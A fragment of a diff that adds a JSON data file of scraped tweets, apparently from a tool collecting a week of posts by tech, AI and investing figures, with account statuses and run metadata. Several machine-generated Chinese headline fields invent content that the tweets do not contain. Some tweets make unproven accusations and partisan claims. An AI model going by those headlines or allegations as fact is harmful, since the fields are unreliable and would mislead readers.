"name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "liuliu", + "name": "刘进" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 259 + }, + "period": { + "days": 7, + "start_utc": "2026-04-20T17:07:01.907904+00:00", + "end_utc": "2026-04-27T17:07:38.921884+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 27, + "active_accounts": 21, + "total_tweets": 259, + "failed_accounts": 0, + "source_hits": { + "nitter": 26 + }, + "source_errors": {} + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", + "url": "https://x.com/elonmusk/status/2048807976991850953", + "published_at": "2026-04-27T16:54:21+00:00", + "source": "nitter", + "title_zh": "OpenAI创始人因诚信问题遭董事会解职,行业呼吁加强AI技术治理监管" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of concern for the truth. People who worked with him say he lies easily but still wants everyone to like him.\n\n• Top scientist Ilya made 70 pages of notes before the firing. They showed Sam was not honest with the team and board about safety rules.\n\n• He changed OpenAI from a nonprofit that Elon helped start to a for profit money making business. It was meant to be open for everyone with no personal gain.\n\n• He trained OpenAI on Twitter data without permission.\n\n• He keeps lying and shows a lack of transparency.\n\n• He poached xAI staff and took sensitive info illegally.\n\n• He dropped core safety promises to race for growth and money. Old team members say his big expensive AI projects around the world are too dangerous.\n\n• An ex OpenAI board member flat out called him a liar.\n\nThis is not just talk. It is what the people closest to him said and what the facts show. When the folks who worked with him say he cannot be trusted.", + "url": "https://x.com/elonmusk/status/2048804363595059425", + "published_at": "2026-04-27T16:39:59+00:00", + "source": "nitter", + "title_zh": "权威机构披露高管不实行为细节,AI领域利益相关方强化信息披露审查标准" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Exactly", + "url": "https://x.com/elonmusk/status/2048802239272169582", + "published_at": "2026-04-27T16:31:33+00:00", + "source": "nitter", + "title_zh": "技术团队内部文件佐证管理争议,引发投资者对人工智能企业治理结构再审视" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style. After this lawsuit, Scam will also be awarded tens of billions in stock directly. \n\nThe fundamental question is simply this: \n\nDo you want to set legal precedent in the United States that it is ok to loot a charity? If so, you undermine all charitable giving in the United States forever.\n\nI could have started OpenAI as a for-profit corporation. Instead, I started it, funded it, recruited critical talent and taught them everything I know about how to make a startup successful FOR THE PUBLIC GOOD.\n\nThen they stole the charity.", + "url": "https://x.com/elonmusk/status/2048801964457140540", + "published_at": "2026-04-27T16:30:27+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Scam Altman", + "url": "https://x.com/elonmusk/status/2048799712375902624", + "published_at": "2026-04-27T16:21:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", + "url": "https://x.com/charliebilello/status/2048799590044852390", + "published_at": "2026-04-27T16:21:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://x.com/jason/status/2048797572014207114", + "published_at": "2026-04-27T16:13:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://x.com/jason/status/2048796982227972344", + "published_at": "2026-04-27T16:10:40+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱", + "url": "https://x.com/elonmusk/status/2048793511701717143", + "published_at": "2026-04-27T15:56:52+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust frequency / skip commentary\n\nit's honestly starting to feel pretty good\n\n\"they want to integrate a fact checker, which is just a polite way of saying their show needs a fact checker\"\n-fox 😂\n\n@Jason check it out 👇", + "url": "https://x.com/jason/status/2048793378511536538", + "published_at": "2026-04-27T15:56:20+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", + "url": "https://x.com/GaryMarcus/status/2048791912149295182", + "published_at": "2026-04-27T15:50:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", + "url": "https://x.com/GaryMarcus/status/2048787646206677207", + "published_at": "2026-04-27T15:33:34+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", + "url": "https://x.com/GaryMarcus/status/2048787157536653627", + "published_at": "2026-04-27T15:31:37+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions.\n\n\"I truly believe, like in my soul, that he is trying to help humanity.\"\n\n\"He has these goals. Like back up the biosphere by making us a multi-planetary species or ushering in electric vehicles.\"\n\n\"These are incredibly important missions.\"\n\n\"Politics became probably the biggest threat as a bottleneck to achieving these very positive missions.\"\n\n\"I personally view the X acquisition as an attempt to help remove these bottlenecks. Through that lens, I think it's been incredibly successful.\"", + "url": "https://x.com/elonmusk/status/2048785882950549854", + "published_at": "2026-04-27T15:26:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", + "url": "https://x.com/elonmusk/status/2048783014075777369", + "published_at": "2026-04-27T15:15:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Best accounts for following Austin air quality? @grok", + "url": "https://x.com/jason/status/2048780089295302690", + "published_at": "2026-04-27T15:03:32+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Excellent point", + "url": "https://x.com/elonmusk/status/2048777628019032335", + "published_at": "2026-04-27T14:53:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://x.com/GaryMarcus/status/2048771044987777428", + "published_at": "2026-04-27T14:27:36+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://x.com/HarryStebbings/status/2048764743205134644", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2048764741435179442", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "published_at": "2026-04-27T13:50:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://x.com/GaryMarcus/status/2048757233174122827", + "published_at": "2026-04-27T13:32:43+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://x.com/HarryStebbings/status/2048756619622707452", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://x.com/sama/status/2048755148361707946", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "published_at": "2026-04-27T13:16:36+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://x.com/sama/status/2048751392031203544", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048751094671585397", + "published_at": "2026-04-27T13:08:19+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", + "url": "https://x.com/charliebilello/status/2048747238986305979", + "published_at": "2026-04-27T12:53:00+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial.\n\nTwo opposing worldviews. \nSam Altman transformed a non-profit organization into one of the world's most profitable companies for his own enrichment.\n\n Elon Musk, who did everything he could to limit the development of AI and, faced with a wall of incomprehension, launched Grok to offer a solution that puts the search for truth at the heart of its search engine.\n\nThe trial is of paramount importance. Elon Musk has already stated that, in the event of a victory, any proceeds he receives will be donated to a charity.\n\nI don't know about you, but for the good of humanity, I hope Elon Musk wins.\nVerdict on May 12th", + "url": "https://x.com/elonmusk/status/2048746715805581608", + "published_at": "2026-04-27T12:50:55+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://x.com/GaryMarcus/status/2048746152749846549", + "published_at": "2026-04-27T12:48:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Enables streaming, gaming, video calls & real-time work onboard\n\n• Rollout begins in 2026 as part of fleet-wide upgrade\n\nA major leap in aviation connectivity 🚀", + "url": "https://x.com/elonmusk/status/2048744214230712500", + "published_at": "2026-04-27T12:40:59+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://x.com/GaryMarcus/status/2048742983684784239", + "published_at": "2026-04-27T12:36:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://x.com/GaryMarcus/status/2048739005525877072", + "published_at": "2026-04-27T12:20:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", + "url": "https://x.com/elonmusk/status/2048727747954868342", + "published_at": "2026-04-27T11:35:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted to remove him from state ballots. \n\nWhen all of that failed they tried to assassinate him not once but four times. \n\nAnd they go on national television to talk about how we need to vote for them to save democracy.", + "url": "https://x.com/elonmusk/status/2048720909809156378", + "published_at": "2026-04-27T11:08:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://x.com/paulg/status/2048704073356935676", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://x.com/paulg/status/2048701354672050286", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://x.com/paulg/status/2048677984106664227", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "😳", + "url": "https://x.com/pmarca/status/2048677114480873657", + "published_at": "2026-04-27T08:14:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @BrendanEich", + "url": "https://x.com/pmarca/status/2048675385119019444", + "published_at": "2026-04-27T08:07:29+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048674564314685477", + "published_at": "2026-04-27T08:04:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", + "url": "https://x.com/pmarca/status/2048673940072251670", + "published_at": "2026-04-27T08:01:44+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @elonmusk", + "url": "https://x.com/pmarca/status/2048673488383447437", + "published_at": "2026-04-27T07:59:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "url": "https://x.com/pmarca/status/2048624098398650608", + "published_at": "2026-04-27T04:43:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon 